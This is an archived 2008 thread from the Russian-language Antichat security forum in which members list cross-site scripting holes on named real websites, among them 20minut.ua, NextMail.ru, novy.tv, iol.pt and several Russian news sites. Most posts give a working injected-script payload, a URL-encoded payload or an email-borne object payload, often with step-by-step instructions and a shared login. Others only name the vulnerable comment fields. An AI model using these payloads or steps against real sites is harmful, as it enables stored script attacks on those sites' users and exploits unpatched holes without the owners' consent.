ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.07.2008, 03:46
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html
---------
Жаль, что ток у мну пашет ( -deleted-
Последний раз редактировалось BlackSun; 11.07.2008 в 14:11..
|
|
|
12.07.2008, 15:16
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от BlackSun
http://vip-file.com
Заливаем .html файл с ксской ..
Пример: http://vip-file.com/download/ae25b2336179/asdwqerfawdq3d.htm.html
---------
Жаль, что ток у мну пашет ( -deleted-
пример http://r27.vip-file.com:81/download9/12-6c6fdb33afc47e1c2f817a460aa79c40/as.html
|
|
|
|
13.07.2008, 10:12
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552
Репутация:
568
|
|
20minut.ua PR 4
http://20minut.ua/?lang_code=1%22%3E%3Cscript%3Ealert('hacked%20by%2 0VITAL')%3C/script%3E&url=http://vital.h.com.ua
активка - сам очень удивился после того как ввел это в строку... после чего зашев на 20minut.ua я увидел свой алерт )
Последний раз редактировалось sabe; 13.07.2008 в 10:15..
|
|
|
|
17.07.2008, 04:12
|
|
Участник форума
Регистрация: 12.11.2006
Сообщений: 213
Провел на форуме:
347573
Репутация:
185
|
|
_http://www.e-xoopport.it/modules/news/
Активная XSS в системе комментариев, в теле сообщения!) Не фильтруется вообще ничего)
|
|
|
|
19.07.2008, 19:10
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
NextMail.ru
Активная ксс, старенькая, но ужось, все еще пашет 
Шлем письмо ..
<object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value='javascript:alert();'></object>
|
|
|
|
03.08.2008, 12:50
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458
Репутация:
3965
|
|
http://novy.tv/services/chat/
Чат "Нового Канала"
Если кто узнает движок, сообщите плз, такой же у прова стоит...
Регаемся, заходим (visto:visto)
Слева, там где Интонация, выбираем "настройка", добавляем свой вариант -
"><script>alert(/Dimi4/)</script>
В меню --- записная книжка --- добавляем запись:
%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2 f%44%69%6d%69%34%2f%29%3c%2f%73%63%72%69%70%74%3e
Ну вообщем может кому пригодится..
и еще фича: если написать в чате сообщение !b blabla !
то текст blabla беоеться в теги
__________________
BlackHat. MoDL
|
|
|
|
04.08.2008, 01:14
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
iol.pt
Активная XSS в почте,
Идем в яшик ( http://webmail.iol.pt/horde/dimp/#folder:INBOX )
Шлем письмо,
Para: - кому,
Assunto: - ксс - <script>alert()</script><noscript>
// BlackSun
|
|
|
|
04.08.2008, 14:20
|
|
Новичок
Регистрация: 20.07.2008
Сообщений: 5
Провел на форуме:
19093
Репутация:
6
|
|
krasnodar2000.ru
Активная XSS в комментах новостей
Уязвимые поля "Ваше имя", "Город"
|
|
|
|
04.08.2008, 14:36
|
|
Новичок
Регистрация: 20.07.2008
Сообщений: 5
Провел на форуме:
19093
Репутация:
6
|
|
nevasport.ru
Активная XSS в комментах новостей
Уязвимое поле "Ваше имя"
|
|
|
|
05.08.2008, 21:15
|
|
Новичок
Регистрация: 20.07.2008
Сообщений: 5
Провел на форуме:
19093
Репутация:
6
|
|
seonews.ru
Активная XSS в комментах новостей
Уязвимое поле "Имя"
Последний раз редактировалось Frozzeg; 05.08.2008 в 21:23..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
